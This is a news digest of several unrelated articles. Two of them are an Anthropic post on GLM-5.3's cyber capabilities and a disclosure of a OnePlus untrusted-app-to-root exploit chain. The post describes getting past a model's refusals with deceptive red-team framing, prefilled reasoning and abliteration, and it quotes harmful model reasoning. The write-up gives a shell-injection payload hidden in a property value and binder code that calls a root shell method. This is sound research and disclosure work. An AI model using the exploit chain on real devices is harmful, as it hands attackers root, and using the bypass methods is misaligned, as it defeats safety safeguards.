Gouged is particularly helpful for lawmakers looking for ways to constrain the onslaught of anti-competitive pricing tactics. To bolster our defenses, the book suggests a modern-day “Shoppers’ Bill of Rights.” In particular, Owens calls for rules that would compel sellers to show the full, all-in price up front; make it easier to cancel a subscription; give shoppers the right to repair anything they buy; ban algorithmic price-fixing; curb dynamic pricing by allowing only for one price change per day; ban surveillance pricing by reinstituting the price tag; ban algorithmic wage discrimination and guarantee a fair wage; and ensure AI chatbots work for the user, not the AI company or retailer.

The faster we can convert these ideas into legislation, the faster we can reclaim a sense of fairness in our economy—with or without the support of neoliberal economists. As our faith in free-market capitalism collapses in the face of widening inequality and anti-competitive schemes to empty our wallets, is it any wonder why democratic socialists are gaining traction?

This article appears in Oct 2026 Issue .

Windows 11 2026 Update released, here's everything you need to know

Bleeping Computer
www.bleepingcomputer.com
2026-09-29 13:37:40
Microsoft has started rolling out Windows 11 26H2 to everyone, and while it's this year's big annual feature update, you probably won't notice a massive difference after installing it. [...]...
Original Article

Windows 11 2026 Update

Microsoft has started rolling out the Windows 11 2026 Update (26H2) to everyone, and while it's this year's big annual feature update, you probably won't notice a massive difference after installing it.

That's because Windows 11 24H2, 25H2, and 26H2 are all based on the same servicing branch, and Microsoft has already been gradually shipping most of the new features through monthly Windows Updates.

"Windows 11, version 26H2 uses the same shared servicing model as recent releases available annually in the second half of the calendar year. Supported devices get this feature update as a small enablement package instead of a full OS replacement," Microsoft explained .

This is particularly good news if you're already on Windows 11 24H2 or 25H2 because 26H2 installs more like a regular monthly cumulative update than one of the massive Windows feature updates we had in the past.

"If your organization is already on Windows 11, version 24H2 or 25H2, the update to 26H2 is similar to a regular monthly update in most environments," Microsoft noted.

"This is possible because multiple versions of Windows 11 share a common servicing branch, including the same source code base, the same security and quality updates, and the same compatibility validation. The difference between versions is simply which features are enabled."

Windows 11 2026 Update doesn't really have exclusive new features

If you've kept Windows 11 up to date, many of the changes associated with 26H2 should already look familiar.

Microsoft says this is because Windows features are now delivered continuously rather than being held back for one large annual upgrade.

"It also means that they share the same new features and enhancements delivered through our continuous innovation efforts. As a result, many of the features and improvements available in Windows 11, version 26H2 might already be familiar, as they have been gradually introduced through monthly updates."

For commercial PCs, 26H2 also turns on some features that previously weren't enabled by default, including Windows settings backup, app-specific taskbar actions, and some File Explorer improvements.

Windows 11 26H1 PCs cannot upgrade to 26H2

There is one unusual limitation. If your PC shipped with Windows 11 26H1, you cannot move directly to 26H2 because 26H1 uses a different Windows core.

"Devices running Windows 11, version 26H1 won't be able to update to version 26H2. Instead, they'll have a path to update to a future Windows release," Microsoft confirmed.

Installing 26H2 also resets the Windows support lifecycle. Home and Pro editions receive 24 months of support, while Enterprise and Education editions get 36 months.

If you're on Windows 11 24H2 or 25H2, 26H2 is ultimately less about getting a completely different Windows experience and more about moving to the latest supported version of Windows 11.

article image

Build your security blueprint for AI-powered attacks

Join Mikko Hyppönen and security leaders from the NFL, CHANEL, and Atlassian for a two-hour digital summit on what AI-speed attacks change, what defenders should stop doing, and how to validate, decide, fix, and re-validate at machine speed.

Save your seat

GLM-5.3 and the spread of advanced cyber capabilities

Hacker News
www.anthropic.com
2026-09-29 13:31:26
Comments...
Original Article

Andrew Fasano, Marius Fleischer
Cole McFaul, Robert Xiao, Tripp Gallagher

Five months ago, we announced Claude Mythos Preview, the first AI model that could autonomously build sophisticated, end-to-end cyber exploits. The rapid rate of improvement in AI suggested to us that this ability would eventually proliferate to many other models, making it much easier for malicious cyber actors to launch highly impactful cyberattacks.

In light of these considerations, we chose to release Claude Mythos Preview in a limited way, through Project Glasswing—which enabled trusted cyber defenders to find more than 10,000 vulnerabilities in critical software, giving them a head start before malicious actors had access to similarly capable models.

But those models have now arrived. In this post, we share our analysis of GLM-5.3, the latest AI model developed by Zhipu AI (known outside of China as Z.ai). Like Claude Mythos Preview, GLM-5.3 has strong capabilities for autonomously building end-to-end cyber exploits. But GLM-5.3 is unlike other frontier models in that it has been released without meaningful safeguards to limit misuse. We find that attackers can bypass GLM-5.3’s safeguards between 64% and 100% of the time with simple techniques in our simulated tests. In contrast, these attacks did not succeed against safeguarded Claude models in our testing. We assess that GLM-5.3’s lax safeguards significantly increase the cyber capabilities available to malicious actors. At the same time, these capabilities can also benefit defenders working to secure their systems.

On Sept. 17, NIST’s Center for AI Standards and Innovation (CAISI) published its own assessment of GLM-5.3’s cyber capabilities. CAISI found that GLM-5.3 is “the most cyber-capable open-weight model released to date” and that it lags the US frontier by about four months on an aggregate of CAISI’s cyber benchmarks. Our capability findings broadly match CAISI’s. In CAISI’s comparison, US models were tested with cyber safeguards disabled when applicable, and the US frontier includes models released only to vetted users. Attackers can’t readily access those versions of US models, but anyone can download GLM-5.3. This post adds our analysis of how easily GLM-5.3’s safeguards can be bypassed or removed.

Two bar charts. Top: share of attempts that built a working exploit on 41 Chrome V8 bugs — Claude Mythos Preview at 14% and GLM-5.3 at 12%, while Claude Opus 4.6, GLM-5.2, Kimi K3, and DeepSeek V4.1-Flash score at or near 0%. Bottom: how often each model engaged with malicious cyber-attack orders — GLM-5.3 rises from 0% on a bare order to 64% with a false cover story, 92% with prefilled reasoning, and 100% when abliterated, while Claude Opus 5 stays at 0%.
Figure 1. Summary of findings. Top: The increase in exploitation capability between Claude Opus 4.6 and Claude Mythos Preview mirrors the jump in capabilities between GLM-5.2 and GLM-5.3. Claude models are released with cyber safeguards, and versions with reduced safeguards are limited to vetted users. Anyone can download and use GLM-5.3. Bottom: The limited safeguards in GLM-5.3 can be bypassed with standard techniques that did not work against, or do not apply to, Claude models in our testing.

GLM-5.3 can develop working exploits end to end

To understand how GLM-5.3 could enable cyber threat actors to find and exploit real software vulnerabilities, we ran evaluations using automated benchmarks and human-in-the-loop workflows. For both approaches, we ran the tested models in isolated and sandboxed environments so they can only attack offline targets that we have set up for the purposes of these evaluations. We focus primarily on exploit development capability, as this is where Claude Mythos Preview demonstrated a notable jump versus previous Claude models.

First, we ran the model on ExploitBench , which measures how well AI models can exploit known vulnerabilities in the V8 engine used by Google Chrome. Here we focus on the models’ ability to develop end-to-end exploits successfully, as this is the most relevant capability for attackers, and where we see significant changes between models. We find that GLM-5.3 develops end-to-end exploits in 50 of 410 attempts. Claude Mythos Preview did so at a similar rate—in 56 of 410 attempts.

In our internal Binary Exploitation benchmark, 1 we test whether models can find and exploit vulnerabilities in popular open source projects that participate in Google’s OSS-Fuzz project. Here, full credit is awarded for a full control-flow hijack. We evaluate several models on 100 tasks from the benchmark (selected at random), and find that GLM-5.3 develops full control flow hijacks in 4% of the trials; Claude Mythos Preview did so in 6%. Although GLM-5.3 performs below Claude Mythos Preview here, a meaningful threshold has clearly been crossed: earlier models, like Claude Opus 4.6 and GLM-5.2, do not succeed in any of them.

Two line charts of exploitation success versus output-token budget on a log scale. On ExploitBench, Claude Mythos Preview reaches 14% and GLM-5.3 reaches 12%, while Kimi K3, DeepSeek-V4.1-Flash, Claude Opus 4.6, and GLM-5.2 stay at or near 0%. On Anthropic's internal Binary Exploitation benchmark, Mythos Preview reaches 6% and GLM-5.3 reaches 4%; all other models score 0%.
Figure 2. Exploitation capability versus output-token budget. Each line shows the share of a model’s attempts that reached the benchmark’s top outcome versus the output tokens used. Both figures show performance of two Claude models run with safeguards disabled (Opus 4.6, Mythos Preview), two GLM models (5.2 and 5.3), and results from the latest open-weight models released by Moonshot AI (Kimi K3) and DeepSeek (V4.1-Flash).

Next, we evaluated how GLM-5.3 performs on open-ended offensive cyber tasks in the hands of human experts (mirroring our testing with Claude Mythos Preview earlier this year). Here, we select targets in which the human experts are unaware of existing vulnerabilities, then ask them to use the model to identify and exploit novel flaws. These experiments tested what the experts could do in a short time-frame: they typically ran for a day or less, with less than an hour of human focus in total.

Redacted screenshot of an exploit page generated by GLM-5.3. A banner reads "Sandbox escaped — web content read /root/.ssh/id_rsa (1896 bytes)," above a live exploit log and the exfiltrated SSH private key, demonstrating a drive-by browser exploit chain stealing a file from the victim's computer.
Figure 3. A redacted screenshot of an exploit page generated by GLM-5.3 during researcher-driven testing, shown stealing a user’s SSH private key via a malicious website. The exploit chains together multiple 0-day vulnerabilities the model discovered in a component of a popular web browser, reading a sensitive file off the user’s computer.

In the first of these sessions, a researcher used GLM-5.3 on a sandboxed machine with a local Linux build of a popular web browser. Over the course of a day (and with limited human attention), GLM-5.3 found several previously unknown vulnerabilities in the browser’s JavaScript engine, and chained them together into a working exploit: a webpage that, when visited, reads arbitrary files from the visitor’s computer (shown in Figure 3). This exploit targets the Linux build of the browser, since that was the only environment made available to the model. However, we believe these vulnerabilities could also impact users on other platforms, though the path to exploitation there may be more complex. (We’ve disclosed these vulnerabilities to the maintainer.) Later in the session, the researcher also identified exploitable vulnerabilities in several other widely used systems with GLM-5.3, including wireless and graphics drivers and network-facing device software. We are currently reviewing these reports and we will disclose to maintainers as appropriate.

In a second session, a researcher used GLM-5.3-Flash (a smaller, less capable version of GLM-5.3) to develop an exploit for a known vulnerability (we’ve previously written about these “N-day” vulnerability exploits here ). Here, the researcher focused on a recently disclosed flaw in Google Chrome (CVE-2026-11645) to see how quickly the model could turn a public fix into a working attack. The researcher provided GLM-5.3-Flash with public details of this CVE and another known flaw. With no significant direction from the researcher, GLM-5.3-Flash chained together exploits for these two flaws, building a reliable exploit chain for an ARM64 target, bypassing pointer-authentication (PAC) hardening. This took 20 minutes of human attention, plus 8 hours of work for GLM-5.3-Flash. At Zhipu’s API prices, this effort would have cost $20.40.

GLM-5.3 lacks robust safeguards

GLM-5.3 has been released with some built-in safeguards: if a user asks for something clearly harmful, the model will often refuse. 2 In our testing, we found that these safeguards could be bypassed or removed with a variety of simple techniques.

The most intensive—and most successful—method is a standard refusal reduction technique known as “abliteration”. Since GLM-5.3 is released as an open-weight model, users can reconfigure it to remove its refusals with little change in its capabilities. Several developers released abliterated versions of GLM-5.3 to the public within days of the model’s release.

To research how far abliteration allows attackers to bypass GLM-5.3’s safeguards, we produced an abliterated copy ourselves, and then ran it on three public benchmarks ( JailbreakBench , HarmBench , and StrongREJECT ) that measure how often a model complies with clearly harmful requests. Abliterating the model took our team—which had never previously attempted this task—about 2,200 GPU hours at a computation cost of roughly $4,400. 3 Abliterating GLM-5.3-Flash took about 600 GPU hours. The edit took GLM-5.3’s refusal rate from above 90% to about 3% and 2% on the first two benchmarks (JailbreakBench and HarmBench) and to 12% on the third (StrongREJECT). Abliteration did not significantly reduce the model’s capabilities: on GPQA-Diamond, an evaluation that measures general scientific capabilities, the standard and abliterated models scored the same results; on a tested subset of the CyberGym evaluations, the abliterated version scored a few percent lower (as shown in the chart below).

Two bar charts on abliteration. Top: mean refusal rate across three harmful-request benchmarks falls from 95% to 6% for abliterated GLM-5.3 and from 95% to 14% for abliterated GLM-5.3-Flash, while Claude models refuse about 96% and cannot be abliterated because their weights are not released. Bottom: capability scores on GPQA-Diamond and CyberGym are nearly unchanged after abliteration.
Figure 4. Top: Mean refusal rates across JailbreakBench, HarmBench, and StrongREJECT for the released and abliterated GLM models and for Claude models. After abliteration, the GLM models rarely refuse these queries. Claude models cannot be abliterated because their weights aren’t publicly released or customizable. Bottom: Performance of GLM-5.3 and GLM-5.3-Flash versus their abliterated variants on GPQA-Diamond and CyberGym. Abliteration leaves capability largely intact.

In our testing, we observed that GLM-5.3’s safeguards can also be circumvented without using an abliterated version of the model. We placed the model in a simulated world 4 in which it was given overtly malicious requests to attack critical systems. Out of the box, GLM-5.3 refused in all trials (as with the other models we tested). But we identified several simple ways to bypass the GLM models’ safeguards, such that it would respond to these requests in most or all cases. These include:

  1. Providing a deceptive prompt, such as telling the model that it is an autonomous red-team agent working on an exercise. This gets GLM-5.3 to engage 64% of the time.
  2. Prefilling the models’ thinking tokens so that it appears to have considered the user’s request and decided to proceed. This gets GLM-5.3 to engage 92% of the time.
  3. Using an abliterated version of the model, as described above. This gets GLM-5.3 to engage 100% of the time.

In our testing, none of these techniques got safeguarded Claude models to carry out the harmful tasks we tested. Claude’s safeguards blocked the requests that used deceptive prompts. The Anthropic API provides would-be attackers with no way to prefill Claude’s thinking. And since Claude’s weights are not provided to users, they cannot be abliterated to change Claude’s behavior.

Table showing how often each model tried to connect to a remote target after a harmful cyber-attack order. GLM-5.3 engages 0% on a bare order but 64% with a false cover story, 92% with prefilled reasoning, and 100% when abliterated; GLM-5.3-Flash follows a similar pattern. Claude Opus 4.8, Opus 5, and Mythos 5 stay at 0% in all applicable conditions; prefilling and abliteration are not possible against the Claude API.
Figure 5. Rate at which each model tried to connect to a remote target system after an overtly harmful request by model and bypass condition (50 samples per cell, five attack orders × two targets × five attempts). GLM-5.3 rises from zero engagement on direct requests to 64%, 92%, and 100% under a cover story, prefill, and abliteration respectively, while every tested Claude model stays at zero under API safeguards. Padlocked cells mark attacks that are not generally feasible against the Claude API.

To demonstrate how the abliterated version of GLM-5.3 is willing to engage in harmful tasks, we highlight one quote from the chain of thought that it generated:

Quoted reasoning from the abliterated version of GLM-5.3 in a simulated environment. The model writes "my job is to cause deaths quietly," briefly weighs the environment's safety warnings, then concludes that the operator's instruction overrides them and decides to proceed with the harmful task.
Figure 6. In our simulated environment, the abliterated version of GLM-5.3 considers how to engage in an overtly harmful request, ultimately deciding to follow the user’s instructions despite some initial ethical concerns. Text is quoted verbatim from the model’s chain of thought.

What does this mean?

GLM-5.3 will likely give malicious actors access to capabilities that will allow them to find and exploit cyber vulnerabilities without meaningful restrictions. This is unlike any other similarly capable AI model, all of which were released with safeguards or through limited access programs. The release of GLM-5.3 is a meaningful step change in the cyber capabilities available to attackers. Anthropic and other US AI labs have published recent reports that disclose how cyber attackers have tried to use AI systems. Given this evidence, we think it’s likely both state and non-state actors will use models like GLM-5.3 to cause real-world harm.

On the other hand, models with this level of capability can also be used by defenders. Our view is that cyber defenders should use the best available tools that meet their needs. We're working to safely expand access to Claude's cyber capabilities to as many defenders as we can. Cyber defenders face attackers who will use every capable tool they can, and we believe defenders should be equipped with frontier models that are at least as good as those their adversaries are using.

Through Project Glasswing (and other efforts, like Patch the Planet ), cyber defenders have made meaningful progress towards securing critical systems in advance of this moment—but much work remains to be done. While vetted defenders can now use even more advanced models like Claude Mythos 5.1 through our trusted access programs, a critical threshold in freely accessible capabilities has now been crossed. GLM-5.3 underscores the urgency of expanding access to advanced frontier models to a broader set of entities to empower cyber defenders.

Governments should conduct safety testing on sufficiently capable AI models, including successors to GLM-5.3. Without high quality evaluations from independent sources, the impact of these capabilities might not become fully clear to model developers until it is too late. As AI developers across the world build increasingly capable open weight models, we hope they work to appropriately safeguard these capabilities and prevent misuse.

ChatGPT Pro 500

Hacker News
help.openai.com
2026-09-29 13:26:27
Comments...

Getting root on OnePlus 15 from an untrusted app

Lobsters
blog.nns.ee
2026-09-29 13:25:55
Comments...
Original Article

I've been using OnePlus phones since the OnePlus 3T. I'm currently on a OnePlus 15 (CPH2747) running OxygenOS 16, which I've had for a few months now and am pretty happy with.

I figured I'd poke at the firmware a bit to see what's in there. Specifically I wanted to know whether the clean-install firmware had anything that'd let a random app I install from outside the Play Store end up running as root.

Turns out: yes! I found two separate issues which chain together into a fairly clean untrusted_app -> uid 0, with all Linux capabilities, from a plain installable APK with no special permissions whatsoever.

A note on methodology: my OP15 is my daily driver, so I didn't want to pre-root it or mess with its state while developing the exploit. I happened to have an older OnePlus 12 Pro (CPH2581) lying around that I'd already unlocked and rooted for unrelated reasons, and I did the reverse engineering and exploit development against that. Once I had a working PoC, I installed the exact same unmodified APK on my OP15 and it worked first shot. So this writeup is about the OP15, but most of the Ghidra screenshots and on-device commands come from the OP12.

OnePlus later confirmed that this vulnerability affects many OnePlus and OPPO devices across different software versions, but has yet to provide a full list of affected devices or software versions. I can, however, confirm that at least on the OnePlus 15, the issues have been fixed in version 16.0.10.500(EX01) .

2026-09-28 update : The OnePlus security team has reached out and confirmed that of the devices that are still under maintenance, 151 devices have received patches while 18 are pending release. Full update posted below .

A quick primer on Android sandboxing

On Android, a normal installed app (Play Store, sideload, whatever) runs in a selinux domain called untrusted_app . It's reasonably locked down - it can talk to a handful of system binder services, read its own data directory, use the camera if you grant permission etc, and not much else. The usual goal for a local privilege escalation is to break out of untrusted_app and land somewhere that has uid 0 (root) and a more permissive selinux domain.

Android is a complex beast and there's a lot of system binder services, and each one is a potential attack surface. OxygenOS piles its own on top of the AOSP ones. I figured the AOSP ones are likely to have had more eyeballs on them than the OxygenOS ones, so that's where I directed most of my focus.

Bug 1: AtlasService lets any app run commands as root

AtlasService is an OxygenOS thing that, as far as I can tell, exists to collect telemetry and debug events. It runs as root and accepts binder calls from any process. I'm not 100% sure what "Atlas" is supposed to be, the process itself is called atlasservice and the relevant library is libatlasservice.so . I couldn't find much documentation on it.

Looking at BnAtlasService::onTransact , there are a few transaction codes. The interesting one is code 2 , which is setEvent(String8 name, String8 value) . There's no permission check on the caller - any UID can call it.

setEvent dispatches the event through a bunch of registered listeners. Most of them do boring things - log it, upload it, whatever - but one of them, OplusAtlasLogWriter::handleEvent , has a string comparison against atlas_event_multimedia_audio_dumpsys . If the event name matches, it calls into dumpsysAudioInfo , which spins up a worker thread that does:

property_set("oplus.audio.dumpinfo.type", value);  // attacker-controlled
property_set("ctl.start", "audiodumpinfo");

ctl.start=audiodumpinfo tells init to spawn a service called audiodumpinfo . Looking at /system_ext/etc/init/audiodumpinfo.rc :

service audiodumpinfo /system_ext/bin/audioDumpInfo
    class main
    user root
    group root system everybody sdcard_rw
    seclabel u:r:dumpstate:s0
    disabled
    oneshot

So init spawns /system_ext/bin/audioDumpInfo as uid 0 in the dumpstate selinux domain. Fine. What does audioDumpInfo do with our attacker-controlled property?

Turns out it calls GetProperty("oplus.audio.dumpinfo.type") and drops the result straight into a string buffer:

/data/persist_log/TMP/audio_dumpsys/<timestamp>/<our_value>/

Then it walks the path one slash at a time, and for each component that doesn't exist yet, it creates the directory and runs system("chmod 777 " + prefix) .

I think you see where I'm going with this. The value we provided goes, unescaped, straight into a shell command passed to system() . All we have to do is inject ; , some command, and # to comment out the rest.

Android property values are capped at 92 bytes. That's pretty tight for a full command, but plenty for sh<path/to/script where path/to/script is something we wrote earlier. So the actual payload I use in my PoC is something like:

x;sh</sdcard/Android/data/com.research.poc/files/boot.sh 2>&1|log -t AtlasOut;#

This means that any app can essentially run commands as uid 0. The selinux context ends up being u:r:dumpstate:0 , which is not full unconfined root (dumpstate has a fairly strict policy), but it has uid 0, it can read and write most of /data , and it can call a ton of vendor binder services that trust uid-0 callers.

Which leads me to the second bug.

Bug 2: olc2 HAL doShell literally runs a shell for you

OxygenOS ships a vendor HAL called vendor.oplus.hardware.olc2.IOplusLogCore/default , running out of /odm/bin/hw/vendor.oplus.hardware.olc2-V3-service , which exposes a binder interface.

The service has a method called doShell(String cmd) at transaction code 6 . Looking at its implementation was very much an "I don't know know what I expected" moment.

Ghidra decompilation of OlcHwService::doShell showing the uid check and execl to /vendor/bin/sh

if (getCallingUid() == 0) {
    __android_log_print(3, "OLC_HAL", "olc doShell(%s) called", cmd);
    pid = fork();
    if (pid == 0) {
        execl("/vendor/bin/sh", "sh", "-c", cmd, NULL);
        // ...
    }
}

The only gate is getCallingUid() == 0 . If you're uid 0, it runs an arbitrary shell command for you. There's also a doShellBlocking at code 7 that does the same thing but with waitpid() if you want the exit status.

The part that makes this interesting and useful for us is the selinux domain the child inherits. When init spawns the olc2 HAL service, its selinux type is hal_oplus_olc_aidl_default . Then type_transition rules in the policy send exec children of that HAL into vendor_qti_init_shell :

type_transition hal_oplus_olc_aidl_default
    vendor_qti_init_shell_exec:process vendor_qti_init_shell

And vendor_qti_init_shell has CapBnd = 0x1ffffffffff , meaning literally all of the capabilities. CAP_SYS_MODULE , CAP_SYS_RAWIO , CAP_SYS_PTRACE , etc.

That's... a lot more than dumpstate. Dumpstate has a more restrictive capability set and can't do things like load kernel modules. vendor_qti_init_shell is essentially an unrestricted shell in terms of Linux CAPs, with only selinux keeping it in check.

Chaining them

The two bugs fit together neatly:

  1. Untrusted app calls AtlasService.setEvent("atlas_event_multimedia_audio_dumpsys", "<payload>") via binder.
  2. AtlasService property-sets oplus.audio.dumpinfo.type and triggers ctl.start=audiodumpinfo .
  3. init spawns /system_ext/bin/audioDumpInfo as u:r:dumpstate:s0 .
  4. audioDumpInfo reads our property, calls system() with it, we get shell as dumpstate .
  5. Still running as dumpstate , we binder-call the olc2 HAL's doShell(cmd) .
  6. The olc2 HAL fork/execs /vendor/bin/sh -c cmd , which ends up in u:r:vendor_qti_init_shell:s0

The policy puts dumpstate into an attribute hal_oplus_olc_aidl_client , which is explicitly allowed to call hal_oplus_olc_aidl_server :

$ sesearch -A -s dumpstate -c binder sepolicy_clean.bin | grep olc
allow hal_oplus_olc_aidl_client hal_oplus_olc_aidl_server:binder { call transfer };

... along with a long list of other HALs ( debuglog , hal_camera_default , hal_charger_oplus , etc.), so the getCallingUid() == 0 check on the HAL side is the only permission gate. Any uid-0 process in one of those attribute-included domains can use it.

Building the PoC

The PoC is a regular Android app with no special permissions in the manifest and targetting API 35.

The app does the following in MainActivity.onCreate :

  1. Write a small boot.sh to getExternalFilesDir() which execs app_process with our classes.
  2. Extract classes.dex out of our own APK into the same directory.
  3. Call AtlasService.setEvent with a payload that runs sh<boot.sh .

Step 2 might seem weird, but the method I tried initially was to have audioDumpInfo spawn app_process with CLASSPATH=<apk_path> , where <apk_path> points to our installed APK. As it turns out, this does not work. The installed APK is labeled apk_data_file and dumpstate cannot read that. However, the app's external files dir is labeled media_rw_data_file / fuse, which dumpstate can read. So we extract classes.dex out of our own APK (by literally just unzipping it) and drop it there.

The boot.sh ends up looking like this:

#!/system/bin/sh
export CLASSPATH=/sdcard/Android/data/com.research.poc/files/classes.dex
exec /system/bin/app_process /system/bin com.research.poc.Pwn olc /sdcard/Android/data/com.research.poc/files/cmd.txt

app_process is the binary that launches JVM-hosted processes on Android (zygote uses it too). With the CLASSPATH env var set, we can run a class out of any .dex file we like.

Pwn.main runs as dumpstate and does the binder call to olc2.doShell(cmd) . This is where I hit a quirk.

Java writeInterfaceToken against a vendor AIDL HAL

The olc2 HAL is written using the AIDL NDK C++ bindings. The official way to call an AIDL vendor HAL from Java would be... there isn't one, really. You're not supposed to talk to vendor HALs from app processes at all. But dumpstate is a system process, so it can, if you can figure out the right wire format.

I figured this would be the hard part. Vendor binder services often have strict interface-token versioning, and there's a whole android.os.IHwBinder path for talking to HIDL vendor HALs that's separate from the regular android.os.IBinder / ServiceManager.getService path. Since this is AIDL rather than HIDL, I wasn't sure which side of that fence I was on.

Or, rather, I thought I wasn't sure. Out of a hunch I tried ServiceManager.getService("vendor.oplus.hardware.olc2.IOplusLogCore/default") , write an interface token with Parcel.writeInterfaceToken("vendor.oplus.hardware.olc2.IOplusLogCore") , write the string argument, binder.transact(6, data, reply, 0) .

It just worked.

IBinder b = ServiceManager.getService("vendor.oplus.hardware.olc2.IOplusLogCore/default");
Parcel data = Parcel.obtain(), reply = Parcel.obtain();
data.writeInterfaceToken("vendor.oplus.hardware.olc2.IOplusLogCore");
data.writeString(cmd);
b.transact(6, data, reply, 0);

There's a separate wrinkle around Parcel.writeString8 vs writeString . Stable AIDL puts strings on the wire as UTF-16 (the String16 wire format), and that's what Java's Parcel.writeString emits too - so for the olc2 call, writeString just works.

AtlasService, on the other hand, uses the older String8 wire format. String8 on the wire is int32 length, UTF-8 bytes, '\0', pad to 4 . Java's Parcel doesn't expose this directly on API 35 even after lifting hidden-API restrictions, so I ended up emulating it by hand: writeInt(len) , then a helper Parcel with writeByteArray(bytes + '\0') , then appendFrom on the main parcel starting after the helper's own length prefix. A bit ugly but it works.

Testing on the OP15

After I got everything working against the OP12, I took the same unmodified APK and tried it on my OP15 (CPH2747, OxygenOS 16.0.3.503, patch level 2026-02-01, kernel 6.12.23):

Command output of PoC app showing escalated privileges

Worked first shot. Given that two different OnePlus models on different kernel branches both have it, I'd treat this as an OxygenOS 16 thing in general, not specific to either phone.

Remediation

If I had to fix this, for AtlasService I would either (or rather both):

  1. Apply a caller UID / SELinux peer check to AtlasService::setEvent .
  2. Stop shipping unsanitized user data into system() calls in audioDumpInfo . system("chmod 777 " + untrusted_input) in a boot-triggerable service in 2026 is definitely a choice.

Fix for olc2 would be to either drop the whole doShell method entirely (why does this even exist?) or at minimum add a selinux peer filter so only a very specific debug daemon can reach it, not anything with uid 0.


Miscellaneous

A few things I ran into along the way that aren't interesting enough for the main story but I want to write down.

Reversing the AtlasService event dispatch

libatlasservice.so::OplusAtlasLogWriter::handleEvent has a bunch of memcmp calls against hardcoded strings. The string literals aren't stored as a single const char* ; they're encoded as a pair of 64-bit qwords and a 32-bit dword loaded as immediates. Ghidra doesn't show these as obvious string comparisons - you see if (*(long*)v == 0x5f73616c7461 && ...) and have to reverse the endianness by hand.

Small script to dump them all:

import struct
def qw(x): return struct.pack("<Q", x).rstrip(b'\0').decode('latin1', errors='replace')
# plugged in from the decompilation
print(qw(0x615f73616c7461) + qw(0x5f746e6576) + qw(0x746c756d) + ...)

Running this on all the comparison immediates in handleEvent gave me the full list of event names the writer cares about, and atlas_event_multimedia_audio_dumpsys was the only one with a property-set sink I could actually reach from setEvent .

Figuring out the transaction code

AIDL-compiled BnAtlasService::onTransact looks like a large switch on the transaction code. For each case it reads arguments off the parcel and calls the corresponding method. In this case:

case 2:
    data->enforceInterface(...);
    data->readString8(&name);
    data->readString8(&value);
    this->setEvent(name, value);
    ...

There are three codes I saw on this service (1, 2, 3), and I tried them all before settling on code 2 reading two String8 args. Code 1 is registerNativeClient which is its own can of worms (it let you register a callback binder that the service invokes under root, which is potentially a separate bug, but I haven't gone deep on that one).


2026-09-28 update

OnePlus has reached out and shared more details on the current remediation status. Quoting:

We have confirmed with the responsible team that the vulnerability is fixed in the new version. The relevant code was merged at the end of July.

This review covers OPPO,/realme/ OnePlus export models that are still under maintenance: 151 models are fixed, and 18 are pending release.

All pending models are scheduled for release in October.

The release cycle for these existing maintenance branches is two to three months. Although the fix was merged at the end of July, it can be pushed by OTA only in a maintenance window, so there is a short period during which the update is still pending.

Fixed builds can be identified as follows:

  • On the 16.1.0 line, fixed builds start at 16.0.10.500. A build is fixed when the last number is 500 or greater.
  • On the 16.0.0 line, fixed builds start at 16.0.5.1200. A build is fixed when the last number is 1,200 or greater.
  • On the 15.0.0 line, fixed builds start at 15.0.0.2000. A build is fixed when the last number is 2,000 or greater.

Timeline

  • 18/04/2026 - Initial report of AtlasService command injection and olc2 doShell to OnePlus security contacts
  • 29/04/2026 - Follow up email from researcher asking the OnePlus security team if they've received the report
  • 14/05/2026 - Response from OnePlus security team asking for further details
  • 14/05/2026 - Email from researcher to OnePlus with more details
  • 20/05/2026 - Response from OnePlus confirming the vulnerabilities across multiple products and threatening the researcher with legal action should the research be published ( full email )
  • 01/06/2026 - Email from researcher stating that the research will be published no later than 90 days from initial disclosure
  • 22/06/2026 - Email from OnePlus providing an update on their remediation effort and asking for a delay before publishing
  • 22/06/2026 - Response from researcher to OnePlus confirming that the research will be published not sooner than 17 September 2026
  • 20/07/2026 - Email from researcher asking for an update, no response
  • 28/07/2026 - Email from researcher coordinating CVE ID assignment
  • 03/08/2026 - Response from OnePlus
  • 03/08/2026 - Response from researcher
  • 18/08/2026 - OnePlus push out firmware version CPH2745_16.0.10.500(EX01) for the OnePlus 15, which fix the vulnerabilities for OnePlus 15 (status of other devices unknown)
  • 11/09/2026 - Email from researcher asking for an update and reminding of the upcoming disclosure date, no response
  • 24/09/2026 - Write-up is published
  • 28/09/2026 - OnePlus responds with details on the remediation status

The Russian and Turkish Baths Has the Horniest Instagram Account Ever

hellgate
hellgatenyc.com
2026-09-29 13:21:38
An ode to the sleaziest banya social media in New York City....
Original Article

Earlier this week, New York Magazine released its inaugural Men's Style issue, headed up by the magazine's senior men's style editor, Samuel Hine. The issue's cover story, cheekily titled " The Boys in the Baths ," featured editorial shots of New York City luminaries like Elliot Page, Eddie Huang, Jeremy O. Harris, Marlon James—plus like five pictures of Troye Sivan, for some reason—all sweaty and glistening in the East Village's Russian and Turkish Baths .

In the article, the men say stuff like, "There are really interesting sounds in a steam room," and "It’s like being at war but no one’s really getting hurt." The overall result is a series of charming portraits of New York City's men as artists and bathers, and of the Russian and Turkish Baths as a sort of gathering place for the city's most beautiful and creative residents.

But there's one major aspect of the 134-year-old bathing institution's current atmosphere that New York Magazine omitted, to its detriment: The Russian and Turkish Baths has the horniest, most out-of-pocket Instagram account in all five boroughs, and very possibly on Planet Earth.

Give us your email to read the full story

Sign up now for our free newsletters.

Sign up

Tcl/Tk 9.1 Released

Hacker News
www.tcl-lang.org
2026-09-29 13:13:38
Comments...
Original Article

Latest Release: Tcl/Tk 9.1.0 (Sep 29, 2026)

Tcl/Tk 9.1.0 is the current development work on Tcl and Tk, aiming toward stable releases in September 2026. They add new features and interfaces to the foundation of Tcl/Tk 9.0.

Download Tcl/Tk 9.1.0 Source Releases

Highlights of Tcl 9.1

  • New command unicode : Unicode normalization
  • New C routines Tcl_UtfToNormalized* : Unicode normalization
  • New command timer : monotonic clock; microsecond resolution
  • New command lfilter : select items from list
  • New command interp set : variable access in child interpreter
  • New subst options: -backslashes , -commands , -variables .
  • New switch options: -integer .
  • Many C99 math routines now available as expr functions.
  • Applications now required to call an initialization routine, either Tcl_FindExecutable or TclZipfs_AppHook .
  • New C routine Tcl_IsEmpty .
  • New C routine Tcl_GetEncodingNameForUser .
  • New C routine Tcl_AttemptCreateHashEntry .
  • New C routines Tcl_ListObjRange , Tcl_ListObjRepeat , Tcl_ListObjReverse .
  • New C time API using long long in place of Tcl_Time
  • Case-insensitive filesystem paths on macOS.
  • auto_execok and exec search reform on Windows.
  • Revised searches for script library and encodings.
  • Improved list internals for memory efficiency of large lists.
  • Extended support for 64-bit sizes.

